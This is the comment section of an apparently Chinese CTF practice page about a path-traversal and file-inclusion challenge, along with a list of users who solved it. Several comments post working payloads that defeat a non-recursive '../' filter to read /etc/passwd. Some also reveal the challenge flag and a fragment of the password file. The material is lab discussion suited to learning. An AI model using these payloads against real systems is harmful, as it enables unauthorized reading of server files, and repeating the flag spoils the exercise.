评分(3)
解题动态
何以书 攻破了该题 16小时前
pakali 攻破了该题 16小时前
wjzkifaa 攻破了该题 19小时前
13615049106 攻破了该题 1天前
Thr0ne 攻破了该题 2天前
fyjfjk 攻破了该题 2天前
胜天3号 攻破了该题 3天前
KDB 攻破了该题 4天前
Test0x0 攻破了该题 5天前
ggtom 攻破了该题 6天前
politely 攻破了该题 6天前
胰梅子子 攻破了该题 6天前
GlowSnow 攻破了该题 7天前
asdliuyan 攻破了该题 7天前
Hydron 攻破了该题 7天前
lijingxin02 攻破了该题 7天前
lywlbk 攻破了该题 7天前
13817113639 攻破了该题 7天前
eatonyu 攻破了该题 8天前
评论
1005667204 2年前
举报
使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd
18993258097 2年前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
菜鸡的小韩 2年前
举报
这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可
ABC第一深情 2年前
举报
/?language=/etc/passwd
曦羽unT0x1ns 2年前
举报
直接用file:///etc/passwd居然也行 oAo
13657809271 1年前
举报
我这样怎么不行
XHTX 2年前
举报
?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子
868954104 2年前
举报
?language=/languages/....//....//....//....//etc/passwd
868954104 2年前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
yituoshi 2年前
举报
Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol
hh0100 2年前
举报
?language=./languages/....//....//....//....//etc/passwd,加这个成功了,谁能讲讲为啥
hack111 2年前
举报
双写,../被屏蔽了然后还会存在一个../